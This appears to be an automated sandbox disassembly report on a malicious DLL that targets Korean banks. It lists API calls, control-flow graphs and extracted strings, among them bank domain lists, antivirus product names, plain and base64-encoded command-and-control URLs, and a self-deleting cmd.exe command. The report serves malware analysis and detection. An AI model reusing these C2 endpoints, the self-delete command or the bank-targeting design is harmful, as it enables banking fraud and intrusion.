                                                control_flow_graph 111 100055e0-100056d1 WSAStartup socket * 2 htons inet_addr htons inet_addr bind ioctlsocket 112 100056d7-10005714 select 111->112 113 10005716-10005727 Sleep 112->113 114 10005729-10005766 112->114 113->112 114->112 117 1000576c-1000576e 114->117 118 10005774-100057ee call 10005530 wsprintfA 117->118 119 10005947-10005956 call 10004da0 117->119 127 100057f0-100057fe 118->127 128 10005828-10005869 malloc htons 118->128 124 10005959-1000597e closesocket * 2 119->124 133 10005820 127->133 134 10005800-1000580e 127->134 129 1000587a-100058de htons * 5 128->129 130 1000586b-10005871 128->130 136 100058e0-100058e5 129->136 137 100058e7 129->137 130->129 132 10005873-10005878 htons 130->132 132->129 133->128 134->133 140 10005810-1000581e 134->140 138 100058ec-10005934 inet_addr 136->138 137->138 142 100056d3 138->142 143 1000593a-10005940 138->143 140->128 140->133 142->112 143->124 145 10005942 143->145 145->112
                                                APIs
                                                Strings
                                                • www.shinhan.com|search.daum.net|search.naver.com|www.kbstar.com.l|www.knbank.co.kr.l|openbank.cu.co.kr.l|www.busanbank.co.kr.l|www.nonghyup.com.l|www.shinhan.com.l|www.wooribank.com.l|www.hanabank.com.l|www.epostbank.go.kr.l|www.ibk.co.kr.l|www.idk.co.l|www.ke, xrefs: 100057D9
                                                • %s|, xrefs: 100057BB
                                                • v3lite, xrefs: 10005814
                                                • c:\3.txt, xrefs: 1000594C
                                                • 127.0.0.1, xrefs: 1000568F, 100058E7
                                                • 8.8.8.8, xrefs: 1000562D
                                                • ahnlab, xrefs: 10005804
                                                • alyac, xrefs: 100057F4
                                                • iRecv=0, xrefs: 10005947
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: htons$inet_addr$closesocketsocket$SleepStartupbindioctlsocketmallocselectwsprintf
                                                • String ID: %s|$127.0.0.1$8.8.8.8$ahnlab$alyac$c:\3.txt$iRecv=0$v3lite$www.shinhan.com|search.daum.net|search.naver.com|www.kbstar.com.l|www.knbank.co.kr.l|openbank.cu.co.kr.l|www.busanbank.co.kr.l|www.nonghyup.com.l|www.shinhan.com.l|www.wooribank.com.l|www.hanabank.com.l|www.epostbank.go.kr.l|www.ibk.co.kr.l|www.idk.co.l|www.ke
                                                • API String ID: 1328051524-4015207955
                                                • Opcode ID: 4828b0be3a3e2642fd62dd5c7122c309b17e755da9cbc61a39448c2e2ba24f89
                                                • Instruction ID: 8807dec323691aef2f5420f23a93805b2fe18ff7326935eede266de03f692902
                                                • Opcode Fuzzy Hash: 4828b0be3a3e2642fd62dd5c7122c309b17e755da9cbc61a39448c2e2ba24f89
                                                • Instruction Fuzzy Hash: 52A1AF31608344ABE710DB64CC45BAFBBE5EF88744F00491DF68597290DBB5E988CB57
                                                Function 100051B0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 92libraryloaderCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • LoadLibraryA.KERNEL32 ref: 100051CA
                                                • GetProcAddress.KERNEL32(00000000,GetExtendedUdpTable), ref: 100051DA
                                                • GetExtendedUdpTable.IPHLPAPI(00000000,?,00000001,00000002,00000001,00000000), ref: 100051F1
                                                • malloc.MSVCRT ref: 1000520A
                                                • GetExtendedUdpTable.IPHLPAPI(00000000,?,00000001,00000002,00000001,00000000,?,?,1000BBB2,00000035), ref: 10005230
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: ExtendedTable$AddressLibraryLoadProcmalloc
                                                • String ID: GetExtendedUdpTable$iphlpapi.dll
                                                • API String ID: 2385667234-1809394930
                                                • Opcode ID: 02ae61e850a1fbcb1a22724745b000119a1a924dfa203604408c47b977caae4e
                                                • Instruction ID: 95fc7806c394d6749ad61a5c4c73f14e2c7cad3558be80feca9663e5c097cf93
                                                • Opcode Fuzzy Hash: 02ae61e850a1fbcb1a22724745b000119a1a924dfa203604408c47b977caae4e
                                                • Instruction Fuzzy Hash: 3A21B171204302ABE710DB68EC85BAB37E4EF857A1F014625F995C62C4D736D989CBA2
                                                Function 1000C230 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 145filewindowCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • sprintf.MSVCRT ref: 1000C249
                                                • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 1000C266
                                                • DeviceIoControl.KERNEL32(00000000,00074080,00000000,00000000,?,00000018,?,00000000), ref: 1000C298
                                                • GetLastError.KERNEL32(00000400,?,00000000,00000000), ref: 1000C2AC
                                                • FormatMessageA.KERNEL32(00001300,00000000,00000000), ref: 1000C2BA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: ControlCreateDeviceErrorFileFormatLastMessagesprintf
                                                • String ID: \\.\PHYSICALDRIVE%d
                                                • API String ID: 1111953355-613073274
                                                • Opcode ID: 5b8cab77ea9baa15ef1ace31b166184b4a38632cffe6251980286e991f52f3d4
                                                • Instruction ID: 2bed02b5d34ca8770e45348e80b358c4abd8b06a0c17b21f9c9ba0ca96d4da27
                                                • Opcode Fuzzy Hash: 5b8cab77ea9baa15ef1ace31b166184b4a38632cffe6251980286e991f52f3d4
                                                • Instruction Fuzzy Hash: 9A4128762503046BF324DA38DC46FEB7395EBD8760F508729FA15CB1C0EEB59A088395
                                                Function 10004F60 Relevance: 7.5, APIs: 5, Instructions: 45COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetCurrentProcess.KERNEL32(00000028,00000000,?,1000BB89,SeDebugPrivilege,00000001), ref: 10004F6A
                                                • OpenProcessToken.ADVAPI32(00000000,?,1000BB89,SeDebugPrivilege,00000001), ref: 10004F71
                                                • LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 10004F87
                                                • AdjustTokenPrivileges.KERNELBASE ref: 10004FCA
                                                • CloseHandle.KERNEL32 ref: 10004FD5
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: ProcessToken$AdjustCloseCurrentHandleLookupOpenPrivilegePrivilegesValue
                                                • String ID:
                                                • API String ID: 3038321057-0
                                                • Opcode ID: 0a72c3fa9fd0ee3bb1be3fa8c5ebfe263c00cb6316c39cb91c3d4bdc8cf6a7c0
                                                • Instruction ID: 7f0ff367e45407a8e9ac9eb591174fee72e0e2360a841818fda95b81e512ac6d
                                                • Opcode Fuzzy Hash: 0a72c3fa9fd0ee3bb1be3fa8c5ebfe263c00cb6316c39cb91c3d4bdc8cf6a7c0
                                                • Instruction Fuzzy Hash: 6401D7B8608301ABE704DF64C885B6A77E8FBC8B45F40891DF54986290DB74D945CB62
                                                Function 10021806 Relevance: 3.2, APIs: 2, Instructions: 200memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualFree.KERNELBASE(00100000,00000000,00008000,10021806,00000000), ref: 1002187F
                                                • VirtualProtect.KERNEL32(003CB200,00000200,10021770,10021517,?,10021770,00000000,10021517), ref: 100219F2
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: Virtual$FreeProtect
                                                • String ID:
                                                • API String ID: 2581862158-0
                                                • Opcode ID: 1af49aae6d613e156a6d82bb86e3b7e212962c21a75418f354bfad0ed6b494bc
                                                • Instruction ID: 3cf54787ec1993463bbc57c4f2f394104f3851b60521f152caf73e44949bcc96
                                                • Opcode Fuzzy Hash: 1af49aae6d613e156a6d82bb86e3b7e212962c21a75418f354bfad0ed6b494bc
                                                • Instruction Fuzzy Hash: 0B614A7AA001219FDB21CF24DC907E9B7B1EFA5350FA505A4D889AB381D770ADC2CB90
                                                Function 1000C160 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                Download Yara Rule
                                                APIs
                                                • DeviceIoControl.KERNEL32(00000000,0007C088,?,00000020,?,00000210,1000C305,00000000), ref: 1000C1B0
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: ControlDevice
                                                • String ID:
                                                • API String ID: 2352790924-0
                                                • Opcode ID: 922dce9e470f2a9cc2907bd16655acb977d25aac2a30b40252a160cce2e3ee64
                                                • Instruction ID: 86cc3cd5e500d09f34f504799c04322c58a7eb8eb055a7fb12ab9f39681c7df9
                                                • Opcode Fuzzy Hash: 922dce9e470f2a9cc2907bd16655acb977d25aac2a30b40252a160cce2e3ee64
                                                • Instruction Fuzzy Hash: 98F0A96228A3C29EE302CB688855BD2FFA47B76710F0CD7C9E1D85B283C2548598D766
                                                Function 10004990 Relevance: 1.5, APIs: 1, Instructions: 10filenetworkCOMMON
                                                Download Yara Rule
                                                APIs
                                                • InternetReadFile.WININET(?,?,000000FF,?), ref: 100049A4
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: FileInternetRead
                                                • String ID:
                                                • API String ID: 778332206-0
                                                • Opcode ID: 299059951f87d2bd72ad2bc17c95e565a8fb2202d3526d3a88a2d9952b43b325
                                                • Instruction ID: 239b56050324291377b7f4a21ae448826d8efed17bf8fca953d792130a950d08
                                                • Opcode Fuzzy Hash: 299059951f87d2bd72ad2bc17c95e565a8fb2202d3526d3a88a2d9952b43b325
                                                • Instruction Fuzzy Hash: B7C002B9608301BFDA04CB94C888D6BB7E9EBC8340F00C90CF59983210C734E841CB22
                                                Function 10004AA0 Relevance: 1.5, APIs: 1, Instructions: 6processCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateToolhelp32Snapshot.KERNEL32(00000000,00000000,100069B2,00000002,00000000,00000000,00000000), ref: 10004AAA
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: CreateSnapshotToolhelp32
                                                • String ID:
                                                • API String ID: 3332741929-0
                                                • Opcode ID: 1682b21d8ce4723ada24454b6901746b0d484530990e3df5589c65f42c8cbb76
                                                • Instruction ID: 1bfc50ff904c48d483376f5291371ce4043d81f8e4f06f90ef1f9d0dc718a3ab
                                                • Opcode Fuzzy Hash: 1682b21d8ce4723ada24454b6901746b0d484530990e3df5589c65f42c8cbb76
                                                • Instruction Fuzzy Hash: 9CB09279104200ABD204DB60C984C2BBBE9BB94310B008808F48582110C631D840CB21
                                                Function 1000BB20 Relevance: 75.5, APIs: 28, Strings: 15, Instructions: 267sleepfilesynchronizationCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 10006A50: wsprintfA.USER32 ref: 10006A7E
                                                  • Part of subcall function 10006A50: GetModuleFileNameA.KERNEL32(00000000,c:\windows\SysWOW64\rundll32.exe,00000104,1000BB2D), ref: 10006A95
                                                  • Part of subcall function 10006A50: GetModuleFileNameA.KERNEL32(10000000,c:\agtve\yhnvs.dll,00000104), ref: 10006AA7
                                                  • Part of subcall function 10006A50: strrchr.MSVCRT ref: 10006AD5
                                                  • Part of subcall function 10006A50: wsprintfA.USER32 ref: 10006AED
                                                  • Part of subcall function 10006A50: wsprintfA.USER32 ref: 10006AFE
                                                  • Part of subcall function 10006A50: wsprintfA.USER32 ref: 10006B0F
                                                • PathFileExistsA.SHLWAPI(c:\test.1), ref: 1000BB32
                                                • GetCurrentProcessId.KERNEL32 ref: 1000BB3C
                                                  • Part of subcall function 10004FF0: OpenProcess.KERNEL32(001F0FFF,00000000,?,?,1000509A,?,74DF0F00), ref: 10004FFD
                                                  • Part of subcall function 10004FF0: TerminateProcess.KERNEL32(00000000,00000000), ref: 1000500C
                                                  • Part of subcall function 10004FF0: CloseHandle.KERNEL32(00000000), ref: 10005017
                                                • ExitProcess.KERNEL32 ref: 1000BB4D
                                                • CreateMutexA.KERNEL32(00000000,00000001,Mkrnaver.com:6520), ref: 1000BB5D
                                                • GetLastError.KERNEL32 ref: 1000BB63
                                                • Sleep.KERNEL32(000007D0), ref: 1000BC33
                                                • DeleteFileA.KERNEL32(?), ref: 1000BC36
                                                • CreateThread.KERNEL32(00000000,00000000,10009230,00000000,00000000,00000000), ref: 1000BC5B
                                                • Sleep.KERNEL32(000003E8), ref: 1000BC62
                                                Strings
                                                • c:\windows\system32, xrefs: 1000BC0B
                                                • Mkrnaver.com:6520, xrefs: 1000BB54
                                                • cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "%s", xrefs: 1000BE1C
                                                • c:\wiseman.exe, xrefs: 1000BBF8, 1000BC12
                                                • d3d3LnNoaW5oYW4uY29tfHNlYXJjaC5kYXVtLm5ldHxzZWFyY2gubmF2ZXIuY29tfHd3dy5rYnN0YXIuY29tLmlrcnx3d3cua25iYW5rLmNvLmtyLmlrcnxvcGVuYmFuay5jdS5jby5rci5pa3J8d3d3LmJ1c2FuYmFuay5jby5rci5pa3J8d3d3Lm5vbmdoeXVwLmNvbS5pa3J8d3d3LnNoaW5oYW4uY29tLmlrcnx3d3cud29vcmliYW5rLmNvbS5p, xrefs: 1000BCAA
                                                • www.shinhan.com|search.daum.net|search.naver.com|www.kbstar.com.l|www.knbank.co.kr.l|openbank.cu.co.kr.l|www.busanbank.co.kr.l|www.nonghyup.com.l|www.shinhan.com.l|www.wooribank.com.l|www.hanabank.com.l|www.epostbank.go.kr.l|www.ibk.co.kr.l|www.idk.co.l|www.ke, xrefs: 1000BCE3
                                                • http://107.163.241.232:12354/show.php, xrefs: 1000BCB9
                                                • c:\test.1, xrefs: 1000BB2D
                                                • SeDebugPrivilege, xrefs: 1000BB7F
                                                • c:\agtve, xrefs: 1000BE13
                                                • krnaver.com:6520, xrefs: 1000BC8D, 1000BD0B
                                                • MTc0LjEzOS42NS44Njo1NjU4MA==, xrefs: 1000BC6D
                                                • c:\agtve\ReadMe.txt, xrefs: 1000BB8E, 1000BBDA
                                                • 123, xrefs: 1000BBBA
                                                • aHR0cDovLzE3NC4xMzkuNjUuMjIyOjI1MzY4L25ld3MucGhw, xrefs: 1000BC7E
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: FileProcesswsprintf$CreateModuleNameSleep$CloseCurrentDeleteErrorExistsExitHandleLastMutexOpenPathTerminateThreadstrrchr
                                                • String ID: 123$MTc0LjEzOS42NS44Njo1NjU4MA==$Mkrnaver.com:6520$SeDebugPrivilege$aHR0cDovLzE3NC4xMzkuNjUuMjIyOjI1MzY4L25ld3MucGhw$c:\agtve$c:\agtve\ReadMe.txt$c:\test.1$c:\windows\system32$c:\wiseman.exe$cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "%s"$d3d3LnNoaW5oYW4uY29tfHNlYXJjaC5kYXVtLm5ldHxzZWFyY2gubmF2ZXIuY29tfHd3dy5rYnN0YXIuY29tLmlrcnx3d3cua25iYW5rLmNvLmtyLmlrcnxvcGVuYmFuay5jdS5jby5rci5pa3J8d3d3LmJ1c2FuYmFuay5jby5rci5pa3J8d3d3Lm5vbmdoeXVwLmNvbS5pa3J8d3d3LnNoaW5oYW4uY29tLmlrcnx3d3cud29vcmliYW5rLmNvbS5p$http://107.163.241.232:12354/show.php$krnaver.com:6520$www.shinhan.com|search.daum.net|search.naver.com|www.kbstar.com.l|www.knbank.co.kr.l|openbank.cu.co.kr.l|www.busanbank.co.kr.l|www.nonghyup.com.l|www.shinhan.com.l|www.wooribank.com.l|www.hanabank.com.l|www.epostbank.go.kr.l|www.ibk.co.kr.l|www.idk.co.l|www.ke
                                                • API String ID: 666504283-1075761258
                                                • Opcode ID: 1a1ffc0209291ceea76840690b20f3bbf0ea9f5aa895b07c39f2ebcda632cb22
                                                • Instruction ID: c2b964bca94a91e70f938dacfcc7d80519b83498a4bbcf2bec864d40d2c1bd09
                                                • Opcode Fuzzy Hash: 1a1ffc0209291ceea76840690b20f3bbf0ea9f5aa895b07c39f2ebcda632cb22
                                                • Instruction Fuzzy Hash: 0171EE75784B007BF220E6B49C47FAA3581DB85B95F210224F706BE1C6EEE4FA44816E
                                                Function 10007800 Relevance: 33.7, APIs: 16, Strings: 3, Instructions: 427COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 146 10007800-1000786e wsprintfA call 10010f36 148 10007873-100078a0 call 10004940 146->148 151 100078a2-100078b4 148->151 152 100078b5-100078d2 call 10004960 148->152 155 100078d4-100078e6 152->155 156 100078e7-10007916 152->156 159 10007918-1000793a 156->159 160 1000793d 156->160 159->160 161 10007941-1000795a call 10004990 160->161 165 10007960-10007963 161->165 166 10007a07-10007a6c 161->166 165->166 167 10007969-10007a02 MultiByteToWideChar call 10010f36 MultiByteToWideChar WideCharToMultiByte call 10010f36 WideCharToMultiByte 6CEE2C70 * 2 165->167 175 10007a70-10007a7f 166->175 176 10007a6e 166->176 167->161 178 10007a81-10007a83 175->178 179 10007af3-10007b12 wsprintfA 175->179 176->175 181 10007aa1-10007aaf 178->181 182 10007a85-10007a8a 178->182 180 10007b14-10007b16 179->180 183 10007b18-10007b1e 180->183 184 10007b3d-10007b54 6CEE2C70 strrchr 180->184 187 10007ac1-10007ad4 181->187 188 10007ab1-10007ab6 181->188 185 10007a97-10007a9e 6CEE2C70 182->185 186 10007a8c-10007a8e 182->186 189 10007b20-10007b32 183->189 190 10007b34-10007b3b 183->190 191 10007bd2-10007bd7 184->191 192 10007b56-10007b5e 184->192 185->181 186->185 193 10007a90-10007a95 186->193 194 10007ad5-10007af2 6CEE2C70 188->194 195 10007ab8-10007aba 188->195 189->180 190->180 196 10007bf5-10007c03 191->196 197 10007bd9-10007bde 191->197 198 10007b60-10007b65 192->198 199 10007b7c-10007b8a 192->199 193->181 195->194 200 10007abc-10007abe 195->200 203 10007c32-10007c44 196->203 204 10007c05-10007c0a 196->204 201 10007be0-10007be2 197->201 202 10007beb-10007bf2 6CEE2C70 197->202 205 10007b72-10007b79 6CEE2C70 198->205 206 10007b67-10007b69 198->206 207 10007bbc-10007bd1 199->207 208 10007b8c-10007b91 199->208 200->187 201->202 209 10007be4-10007be9 201->209 202->196 210 10007c28-10007c2f 6CEE2C70 204->210 211 10007c0c-10007c0e 204->211 205->199 206->205 212 10007b6b-10007b70 206->212 213 10007bb2-10007bb9 6CEE2C70 208->213 214 10007b93-10007b95 208->214 209->196 210->203 211->210 215 10007c10-10007c27 211->215 212->199 213->207 214->213 216 10007b97-10007bb1 214->216
                                                APIs
                                                • wsprintfA.USER32 ref: 10007863
                                                  • Part of subcall function 10004940: InternetOpenA.WININET(?,?,?,?,?), ref: 10004959
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: InternetOpenwsprintf
                                                • String ID: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)$http://blog.sina.com.cn/u/%s$title
                                                • API String ID: 4197039022-1204782975
                                                • Opcode ID: ac3329271bd9d36dabe8b2f1c970d2275d2f31060d9b6ba8ce49d74b3c14c55d
                                                • Instruction ID: 095fe5dde53d71875dce48b6fc83110d19f8d3916a50ec2a0be112dbd884ee86
                                                • Opcode Fuzzy Hash: ac3329271bd9d36dabe8b2f1c970d2275d2f31060d9b6ba8ce49d74b3c14c55d
                                                • Instruction Fuzzy Hash: 8DD16B75E041446FEB14CF68CC81BFEBBA5FB442A0F10426EF9199B281DB769E01C7A1
                                                Function 100075F0 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 168stringnetworkCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: strcspnstrstr$strncpy$Startupatoiclosesocketconnecthtonssocket
                                                • String ID: http://
                                                • API String ID: 2221484516-1121587658
                                                • Opcode ID: 5c2d05fa6207655839d0808158efd3d400898c35f4cf240536f96aa1fb864cbe
                                                • Instruction ID: c21daf10c3e951720ad3e589d1e55667024fa973de2a3a3a443ae2c0494599a8
                                                • Opcode Fuzzy Hash: 5c2d05fa6207655839d0808158efd3d400898c35f4cf240536f96aa1fb864cbe
                                                • Instruction Fuzzy Hash: 1E5104312043046BE314CB34CC44BEBB3D9FFC9350F404A2CFA5997280EB79DA1886A6
                                                Function 10004DA0 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 145filestringCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,?,74DF0F00,10005086,00000000,self), ref: 10004DFC
                                                • strrchr.MSVCRT ref: 10004E09
                                                • CreateFileA.KERNEL32(?,MZ@,00000007,00000000,00000004,00000080,00000000), ref: 10004E62
                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 10004E78
                                                • time.MSVCRT(00000000), ref: 10004E7F
                                                • _localtime32.MSVCRT(?), ref: 10004E8E
                                                • strftime.MSVCRT ref: 10004EA1
                                                • vsprintf.MSVCRT ref: 10004EF3
                                                • sprintf.MSVCRT ref: 10004F13
                                                • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 10004F3D
                                                • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 10004F44
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
